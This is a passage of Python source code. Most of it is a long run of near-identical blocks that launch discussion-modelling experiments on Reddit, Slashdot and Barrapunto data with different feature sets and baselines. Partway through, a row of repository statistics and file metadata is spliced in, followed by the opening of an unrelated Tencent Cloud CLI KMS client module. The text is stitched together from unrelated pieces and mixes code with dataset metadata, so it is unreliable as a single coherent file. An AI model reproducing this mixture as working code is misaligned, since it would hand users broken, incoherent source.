EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = True
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = True
DATA_FOLDER = data_folder + "/reddit"
FEATURE_OSN_NAME_LIST = ["reddit"]
TARGET_OSN_NAME = "reddit" # OSN targets.
OSN_NAME_FOCUS = "reddit" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users", "score_wilson", "controversiality_wilson"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
def slashdot_experiments(data_folder):
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "mean"
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "median"
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "comments"
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "users"
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "comments_users"
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "simple graph"
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
HANDCRAFTED_FEATURES_DIMENSIONALITY = 5
BIPARTITE_GRAPH_FEATURES_DIMENSIONALITY = 50
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = True
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = True
DATA_FOLDER = data_folder + "/slashdot"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
def barrapunto_experiments(data_folder):
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "mean"
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "median"
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "comments"
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "users"
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "comments_users"
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["baseline"] = "simple graph"
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = False
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = False
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = True
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
EXPERIMENT_CONSTRUCTION_TYPE = dict()
EXPERIMENT_CONSTRUCTION_TYPE["add_branching_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_usergraph_features"] = True
EXPERIMENT_CONSTRUCTION_TYPE["add_temporal_features"] = True
DATA_FOLDER = data_folder + "/barrapunto"
FEATURE_OSN_NAME_LIST = ["slashdot"]
TARGET_OSN_NAME = "slashdot" # OSN targets.
OSN_NAME_FOCUS = "slashdot" # OSN-based timestamps.
TARGET_NAME_LIST = ["comments", "users"]
NUMBER_OF_FOLDS = 10
experiment = DiscussionModellingExperiment(experiment_construction_dict=EXPERIMENT_CONSTRUCTION_TYPE,
data_folder=DATA_FOLDER,
feature_osn_name_list=FEATURE_OSN_NAME_LIST,
target_osn_name=TARGET_OSN_NAME,
osn_name_focus=OSN_NAME_FOCUS,
target_name_list=TARGET_NAME_LIST,
number_of_folds=NUMBER_OF_FOLDS)
experiment.do_experiment()
| 50.436693 | 105 | 0.607306 | 3,612 | 39,038 | 6.0299 | 0.016888 | 0.095455 | 0.218457 | 0.131818 | 0.989669 | 0.989669 | 0.989669 | 0.989669 | 0.989669 | 0.989669 | 0 | 0.002641 | 0.330627 | 39,038 | 773 | 106 | 50.50194 | 0.830852 | 0.029561 | 0 | 0.988691 | 0 | 0 | 0.113917 | 0.063411 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004847 | false | 0 | 0.001616 | 0 | 0.006462 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
400201dbac9e5ac09d3d9cec4c0cc0fe06c52772 | 66,239 | py | Python | tccli/services/kms/kms_client.py | ws0416/tencentcloud-cli | 0a90fa77c8be1efa30b196a3eeb31b8be1f6a325 | [
"Apache-2.0"
] | null | null | null | tccli/services/kms/kms_client.py | ws0416/tencentcloud-cli | 0a90fa77c8be1efa30b196a3eeb31b8be1f6a325 | [
"Apache-2.0"
] | null | null | null | tccli/services/kms/kms_client.py | ws0416/tencentcloud-cli | 0a90fa77c8be1efa30b196a3eeb31b8be1f6a325 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.kms.v20190118 import kms_client as kms_client_v20190118
from tencentcloud.kms.v20190118 import models as models_v20190118
def doDeleteImportedKeyMaterial(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteImportedKeyMaterialRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteImportedKeyMaterial(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEncrypt(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.KmsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EncryptRequest()
model.from_json_string(json.dumps(args))
